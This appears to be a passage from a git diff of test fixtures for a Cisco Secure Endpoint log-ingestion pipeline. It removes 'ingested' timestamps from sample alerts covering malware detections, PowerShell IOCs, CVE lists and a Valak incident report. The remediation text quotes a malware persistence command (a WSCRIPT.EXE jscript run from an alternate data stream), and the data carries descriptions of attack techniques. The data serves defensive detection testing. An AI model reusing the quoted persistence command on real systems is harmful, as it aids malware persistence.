Detected\",\"event_type_id\":1090519054,\"detection\":\"Auto.F2863A.211556.in02\",\"detection_id\":\"6525516191325224961\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Intel\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e6:44:a0:56:f3:9a\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"twhy.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Roaming\\\\twhy.exe\",\"identity\":{\"sha256\":\"f2863a775c7faa85aefa3814530d9356ff700ae8bf534584652c2b4b720ee117\",\"sha1\":\"7d9518ea3f98d037745352b23861fab05d3777dc\",\"md5\":\"c624d61b8f076c3ef05f74eeb96c8954\"},\"parent\":{\"process_id\":4868,\"disposition\":\"Clean\",\"file_name\":\"powershell.exe\",\"identity\":{\"sha256\":\"6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7\",\"sha1\":\"04c5d2b4da9a0f3fa8a45702d4256cee42d8c48d\",\"md5\":\"92f44e405db16ac55d97e3bfe3b132fa\"}}}}}", "severity": 2 
@@ -3373,7 +3333,6 @@ ], "code": "553648143", "id": "6525516191325225000", - "ingested": "2022-02-02T05:52:16.386329297Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6525516191325225000,\"timestamp\":1608874244,\"timestamp_nanoseconds\":500000000,\"date\":\"2020-12-25T05:30:44+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6525516191325224961\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Intel\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e6:44:a0:56:f3:9a\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"f2863a775c7faa85aefa3814530d9356ff700ae8bf534584652c2b4b720ee117\"}}}}", "severity": 2 
@@ -3452,7 +3411,6 @@ ], "code": "1107296274", "id": "1519340132516139000", - "ingested": "2022-02-02T05:52:16.386330260Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":1519340132516139000,\"timestamp\":1608874241,\"timestamp_nanoseconds\":516130000,\"date\":\"2020-12-25T05:30:41+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"start_timestamp\":1608874241,\"start_date\":\"2020-12-25T05:30:41+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Intel\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e6:44:a0:56:f3:9a\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"PowerShell is a Windows utility that allows access to many Microsoft APIs within a shell environment. In this case, a script attempted to download a file or script to the local system and then execute it. 
Malware authors may use this to download items, rename them, execute and delete them with a single command.\",\"short_description\":\"W32.PowershellDownloadedExecutable.ioc\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"powershell.exe\",\"file_path\":\"/C:/Windows/SysWOW64/WindowsPowerShell/v1.0/powershell.exe\",\"identity\":{\"sha256\":\"6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"664e83900e42179cfea99edb71abaf00b35e558da8d5f2e35004b2a623d5b5f7\"}}}}}", "severity": 3, 
@@ -3539,7 +3497,6 @@ ], "code": "1107296274", "id": "1519340132474871000", - "ingested": "2022-02-02T05:52:16.386331220Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":1519340132474871000,\"timestamp\":1608874241,\"timestamp_nanoseconds\":474861000,\"date\":\"2020-12-25T05:30:41+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"start_timestamp\":1608874241,\"start_date\":\"2020-12-25T05:30:41+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Intel\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e6:44:a0:56:f3:9a\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"Microsoft Word launched PowerShell. This is indicative of multiple dropper variants that make use of Visual Basic Application macros to perform nefarious activities, such as downloading and executing malicious executables.\",\"short_description\":\"W32.WinWord.Powershell\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"powershell.exe\",\"file_path\":\"/C:/Windows/SysWOW64/WindowsPowerShell/v1.0/powershell.exe\",\"identity\":{\"sha256\":\"6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"664e83900e42179cfea99edb71abaf00b35e558da8d5f2e35004b2a623d5b5f7\"}}}}}", "severity": 2, 
@@ -3640,7 +3597,6 @@ ], "code": "1107296279", "id": "15193384389977", - "ingested": "2022-02-02T05:52:16.386332203Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":15193384389977,\"timestamp\":1608872547,\"timestamp_nanoseconds\":0,\"date\":\"2020-12-25T05:02:27+00:00\",\"event_type\":\"Vulnerable Application Detected\",\"event_type_id\":1107296279,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Low\",\"start_timestamp\":1608872547,\"start_date\":\"2020-12-25T05:02:27+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Intel\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e6:44:a0:56:f3:9a\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"mshtml.dll\",\"identity\":{\"sha256\":\"d1bea74ac9d85b3dcd4abc1af42af6c37b9349defc8e6577993611b773f56ca0\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"93b2ed4004ed5f7f3039dd7ecbd22c7e4e24b6373b4d9ef8d6e45a179b13a5e8\"}}},\"vulnerabilities\":[{\"name\":\"Microsoft Internet Explorer\",\"version\":\"11\",\"cve\":\"CVE-2018-0762\",\"score\":\"7.6\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-0762\"},{\"cve\":\"CVE-2018-0772\",\"score\":\"7.6\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-0772\"}]}}", "severity": 1, 
@@ -3740,7 +3696,6 @@ ], "code": "1107296279", "id": "15193384371995", - "ingested": "2022-02-02T05:52:16.386333156Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":15193384371995,\"timestamp\":1608872546,\"timestamp_nanoseconds\":0,\"date\":\"2020-12-25T05:02:26+00:00\",\"event_type\":\"Vulnerable Application Detected\",\"event_type_id\":1107296279,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Low\",\"start_timestamp\":1608872546,\"start_date\":\"2020-12-25T05:02:26+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Intel\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e6:44:a0:56:f3:9a\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"mshtml.dll\",\"identity\":{\"sha256\":\"1dc5d15a26a79bb46519952a60b15aa4acb36f6ce3247ebf50df9c157bc4fcf4\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"93b2ed4004ed5f7f3039dd7ecbd22c7e4e24b6373b4d9ef8d6e45a179b13a5e8\"}}},\"vulnerabilities\":[{\"name\":\"Microsoft Internet Explorer\",\"version\":\"11\",\"cve\":\"CVE-2018-0762\",\"score\":\"7.6\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-0762\"},{\"cve\":\"CVE-2018-0772\",\"score\":\"7.6\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-0772\"}]}}", "severity": 1, 
@@ -3870,7 +3825,6 @@ ], "code": "1107296279", "id": "15193366641599", - "ingested": "2022-02-02T05:52:16.386334119Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":15193366641599,\"timestamp\":1608870773,\"timestamp_nanoseconds\":0,\"date\":\"2020-12-25T04:32:53+00:00\",\"event_type\":\"Vulnerable Application Detected\",\"event_type_id\":1107296279,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Low\",\"start_timestamp\":1608870773,\"start_date\":\"2020-12-25T04:32:53+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Intel\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e6:44:a0:56:f3:9a\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"OUTLOOK.EXE\",\"identity\":{\"sha256\":\"465f398ae8e3c32395eb7c04bc8cd24595068e6a127e243bed3e9b4931556bfc\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"71854d2c40664493e05c0a7e4f0c7cc74ada1a63eec1d4fe32350f6af8728243\"}}},\"vulnerabilities\":[{\"name\":\"Microsoft 
Office\",\"version\":\"2016\",\"cve\":\"CVE-2017-0106\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-0106\"},{\"cve\":\"CVE-2017-11774\",\"score\":\"6.8\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11774\"},{\"cve\":\"CVE-2017-8506\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-8506\"},{\"cve\":\"CVE-2017-8507\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-8507\"},{\"cve\":\"CVE-2017-8571\",\"score\":\"6.8\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-8571\"},{\"cve\":\"CVE-2017-8663\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-8663\"},{\"cve\":\"CVE-2018-0791\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-0791\"}]}}", "severity": 1, 
@@ -3941,7 +3895,6 @@ "action": "Policy Update", "code": "553648130", "id": "6525498672153625000", - "ingested": "2022-02-02T05:52:16.386335086Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6525498672153625000,\"timestamp\":1608870165,\"timestamp_nanoseconds\":878000000,\"date\":\"2020-12-25T04:22:45+00:00\",\"event_type\":\"Policy Update\",\"event_type_id\":553648130,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Intel\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e6:44:a0:56:f3:9a\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}}}}", "severity": 0 
@@ -4005,7 +3958,6 @@ "action": "Scan Completed, No Detections", "code": "554696715", "id": "6525494703603843000", - "ingested": "2022-02-02T05:52:16.386336054Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6525494703603843000,\"timestamp\":1608869241,\"timestamp_nanoseconds\":928000000,\"date\":\"2020-12-25T04:07:21+00:00\",\"event_type\":\"Scan Completed, No Detections\",\"event_type_id\":554696715,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Intel\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e6:44:a0:56:f3:9a\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"scan\":{\"description\":\"Flash Scan\",\"clean\":true,\"scanned_files\":2872,\"scanned_processes\":49,\"scanned_paths\":0,\"malicious_detections\":0}}}", "severity": 0 
@@ -4064,7 +4016,6 @@ "action": "Scan Started", "code": "554696714", "id": "6525494527510184000", - "ingested": "2022-02-02T05:52:16.386337068Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6525494527510184000,\"timestamp\":1608869200,\"timestamp_nanoseconds\":537000000,\"date\":\"2020-12-25T04:06:40+00:00\",\"event_type\":\"Scan Started\",\"event_type_id\":554696714,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Intel\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e6:44:a0:56:f3:9a\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"scan\":{\"description\":\"Flash Scan\"}}}", "severity": 0 diff --git a/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp2.log-expected.json b/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp2.log-expected.json index 95133cef5be..02872ce9e46 100644 --- a/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp2.log-expected.json +++ b/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp2.log-expected.json 
@@ -86,7 +86,6 @@ "event": { "action": "SecureX Threat Hunting Incident", "code": "1107296344", - "ingested": "2022-02-02T05:52:24.688944674Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"timestamp\":1610711992,\"timestamp_nanoseconds\":155518026,\"date\":\"2021-01-15T11:59:52+00:00\",\"event_type\":\"SecureX Threat Hunting Incident\",\"event_type_id\":1107296344,\"connector_guid\":\"test_connector_guid\",\"severity\":\"Critical\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Threat_Hunting\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"87:c2:d9:a2:8c:74\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"threat_hunting\":{\"incident_report_guid\":\"6e5292d5-248c-49dc-839d-201bcba64562\",\"incident_hunt_guid\":\"4bdbaf20-020f-4bb5-9da9-585da0e07817\",\"incident_title\":\"Valak Variant\",\"incident_summary\":\"The host Demo_Threat_Hunting is compromised by a Valak malware variant. Valak is a multi-stage malware attack that uses screen capture, reconnaissance, geolocation, and fileless execution techniques to infiltrate and exfiltrate sensitive information. 
Based on the event details listed and the techniques used, we recommend the host in question be investigated further.\",\"incident_remediation\":\"We recommend the following:\\r\\n\\r\\n- Isolation of the affected hosts from the network\\r\\n- Perform forensic investigation\\r\\n - Review all activity performed by the user\\r\\n - Upload any suspicious files to ThreatGrid for analysis\\r\\n - Search the registry for data \\\"var config = ( COMMAND_C2\\\" and remove the key\\r\\n - Review scheduled tasks and cancel any involving the execution of WSCRIPT.EXE //E:jscript C:\\\\Users\\\\Public\\\\PowerManagerSpm.jar:LocalZone lqjsxokgowhbxjaetyrifnbigtcxmuj eimljujnv\\r\\n - Remove the Alternate Data Stream file located C:\\\\Users\\\\Public\\\\PowerManagerSpm.jar:LocalZone.\\r\\n- If possible, reimage the affected system to prevent potential unknown persistence methods.\",\"incident_id\":416,\"tactics\":[{\"name\":\"Defense Evasion\",\"description\":\"\u003cp\u003eThe adversary is trying to avoid being detected.\u003c/p\u003e\\n\\n\u003cp\u003eDefense Evasion consists of techniques that adversaries use to avoid detection throughout their compromise. Techniques used for defense evasion include uninstalling/disabling security software or obfuscating/encrypting data and scripts. Adversaries also leverage and abuse trusted processes to hide and masquerade their malware. 
Other tactics’ techniques are cross-listed here when those techniques include the added benefit of subverting defenses.\u003c/p\u003e\\n\",\"external_id\":\"TA0005\",\"mitre_name\":\"tactic\",\"mitre_url\":\"https://attack.mitre.org/tactics/TA0005\"}],\"techniques\":[{\"name\":\"Data from Local System\",\"description\":\"\u003cp\u003eAdversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.\u003c/p\u003e\\n\\n\u003cp\u003eAdversaries may do this using a \u003ca href=\\\"https://attack.mitre.org/techniques/T1059\\\"\u003eCommand and Scripting Interpreter\u003c/a\u003e, such as \u003ca href=\\\"https://attack.mitre.org/software/S0106\\\"\u003ecmd\u003c/a\u003e, which has functionality to interact with the file system to gather information. Some adversaries may also use \u003ca href=\\\"https://attack.mitre.org/techniques/T1119\\\"\u003eAutomated Collection\u003c/a\u003e on the local system.\u003c/p\u003e\\n\",\"external_id\":\"T1005\",\"mitre_name\":\"technique\",\"mitre_url\":\"https://attack.mitre.org/techniques/T1005\",\"tactics_names\":\"Collection\",\"platforms\":\"Linux, macOS, Windows\",\"system_requirements\":\"Privileges to access certain files and directories\",\"permissions\":\"\",\"data_sources\":\"File monitoring, Process monitoring, Process command-line parameters\"},{\"name\":\"Scheduled Task/Job\",\"description\":\"\u003cp\u003eAdversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). 
Scheduling a task on a remote system typically requires being a member of an admin or otherwise privileged group on the remote system.(Citation: TechNet Task Scheduler Security)\u003c/p\u003e\\n\\n\u003cp\u003eAdversaries may use task scheduling to execute programs at system startup or on a scheduled basis for persistence. These mechanisms can also be abused to run a process under the context of a specified account (such as one with elevated permissions/privileges).\u003c/p\u003e\\n\",\"external_id\":\"T1053\",\"mitre_name\":\"technique\",\"mitre_url\":\"https://attack.mitre.org/techniques/T1053\",\"tactics_names\":\"Execution, Persistence, Privilege Escalation\",\"platforms\":\"Windows, Linux, macOS\",\"system_requirements\":null,\"permissions\":\"Administrator, SYSTEM, User\",\"data_sources\":\"File monitoring, Process monitoring, Process command-line parameters, Windows event logs\"},{\"name\":\"Scripting\",\"description\":\"\u003cp\u003e\u003cstrong\u003eThis technique has been deprecated. Please use \u003ca href=\\\"https://attack.mitre.org/techniques/T1059\\\"\u003eCommand and Scripting Interpreter\u003c/a\u003e where appropriate.\u003c/strong\u003e\u003c/p\u003e\\n\\n\u003cp\u003eAdversaries may use scripts to aid in operations and perform multiple actions that would otherwise be manual. Scripting is useful for speeding up operational tasks and reducing the time required to gain access to critical resources. Some scripting languages may be used to bypass process monitoring mechanisms by directly interacting with the operating system at an API level instead of calling other programs. 
Common scripting languages for Windows include VBScript and \u003ca href=\\\"https://attack.mitre.org/techniques/T1086\\\"\u003ePowerShell\u003c/a\u003e but could also be in the form of command-line batch scripts.\u003c/p\u003e\\n\\n\u003cp\u003eScripts can be embedded inside Office documents as macros that can be set to execute when files used in \u003ca href=\\\"https://attack.mitre.org/techniques/T1193\\\"\u003eSpearphishing Attachment\u003c/a\u003e and other types of spearphishing are opened. Malicious embedded macros are an alternative means of execution than software exploitation through \u003ca href=\\\"https://attack.mitre.org/techniques/T1203\\\"\u003eExploitation for Client Execution\u003c/a\u003e, where adversaries will rely on macros being allowed or that the user will accept to activate them.\u003c/p\u003e\\n\\n\u003cp\u003eMany popular offensive frameworks exist which use forms of scripting for security testers and adversaries alike. Metasploit (Citation: Metasploit_Ref), Veil (Citation: Veil_Ref), and PowerSploit (Citation: Powersploit) are three examples that are popular among penetration testers for exploit and post-compromise operations and include many features for evading defenses. Some adversaries are known to use PowerShell. 
(Citation: Alperovitch 2014)\u003c/p\u003e\\n\",\"external_id\":\"T1064\",\"mitre_name\":\"technique\",\"mitre_url\":\"https://attack.mitre.org/techniques/T1064\",\"tactics_names\":\"Defense Evasion, Execution\",\"platforms\":\"Linux, macOS, Windows\",\"system_requirements\":null,\"permissions\":\"User\",\"data_sources\":\"Process monitoring, File monitoring, Process command-line parameters\"}],\"severity\":\"critical\",\"incident_start_time\":1610707688,\"incident_end_time\":1592478770},\"tactics\":[{\"name\":\"Defense Evasion\",\"description\":\"\u003cp\u003eThe adversary is trying to avoid being detected.\u003c/p\u003e\\n\\n\u003cp\u003eDefense Evasion consists of techniques that adversaries use to avoid detection throughout their compromise. Techniques used for defense evasion include uninstalling/disabling security software or obfuscating/encrypting data and scripts. Adversaries also leverage and abuse trusted processes to hide and masquerade their malware. Other tactics’ techniques are cross-listed here when those techniques include the added benefit of subverting defenses.\u003c/p\u003e\\n\",\"external_id\":\"TA0005\",\"mitre_name\":\"tactic\",\"mitre_url\":\"https://attack.mitre.org/tactics/TA0005\"}],\"techniques\":[{\"name\":\"Data from Local System\",\"description\":\"\u003cp\u003eAdversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.\u003c/p\u003e\\n\\n\u003cp\u003eAdversaries may do this using a \u003ca href=\\\"https://attack.mitre.org/techniques/T1059\\\"\u003eCommand and Scripting Interpreter\u003c/a\u003e, such as \u003ca href=\\\"https://attack.mitre.org/software/S0106\\\"\u003ecmd\u003c/a\u003e, which has functionality to interact with the file system to gather information. 
Some adversaries may also use \u003ca href=\\\"https://attack.mitre.org/techniques/T1119\\\"\u003eAutomated Collection\u003c/a\u003e on the local system.\u003c/p\u003e\\n\",\"external_id\":\"T1005\",\"mitre_name\":\"technique\",\"mitre_url\":\"https://attack.mitre.org/techniques/T1005\",\"tactics_names\":\"Collection\",\"platforms\":\"Linux, macOS, Windows\",\"system_requirements\":\"Privileges to access certain files and directories\",\"permissions\":\"\",\"data_sources\":\"File monitoring, Process monitoring, Process command-line parameters\"},{\"name\":\"Scheduled Task/Job\",\"description\":\"\u003cp\u003eAdversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically requires being a member of an admin or otherwise privileged group on the remote system.(Citation: TechNet Task Scheduler Security)\u003c/p\u003e\\n\\n\u003cp\u003eAdversaries may use task scheduling to execute programs at system startup or on a scheduled basis for persistence. 
These mechanisms can also be abused to run a process under the context of a specified account (such as one with elevated permissions/privileges).\u003c/p\u003e\\n\",\"external_id\":\"T1053\",\"mitre_name\":\"technique\",\"mitre_url\":\"https://attack.mitre.org/techniques/T1053\",\"tactics_names\":\"Execution, Persistence, Privilege Escalation\",\"platforms\":\"Windows, Linux, macOS\",\"system_requirements\":null,\"permissions\":\"Administrator, SYSTEM, User\",\"data_sources\":\"File monitoring, Process monitoring, Process command-line parameters, Windows event logs\"},{\"name\":\"Scripting\",\"description\":\"\u003cp\u003e\u003cstrong\u003eThis technique has been deprecated. Please use \u003ca href=\\\"https://attack.mitre.org/techniques/T1059\\\"\u003eCommand and Scripting Interpreter\u003c/a\u003e where appropriate.\u003c/strong\u003e\u003c/p\u003e\\n\\n\u003cp\u003eAdversaries may use scripts to aid in operations and perform multiple actions that would otherwise be manual. Scripting is useful for speeding up operational tasks and reducing the time required to gain access to critical resources. Some scripting languages may be used to bypass process monitoring mechanisms by directly interacting with the operating system at an API level instead of calling other programs. Common scripting languages for Windows include VBScript and \u003ca href=\\\"https://attack.mitre.org/techniques/T1086\\\"\u003ePowerShell\u003c/a\u003e but could also be in the form of command-line batch scripts.\u003c/p\u003e\\n\\n\u003cp\u003eScripts can be embedded inside Office documents as macros that can be set to execute when files used in \u003ca href=\\\"https://attack.mitre.org/techniques/T1193\\\"\u003eSpearphishing 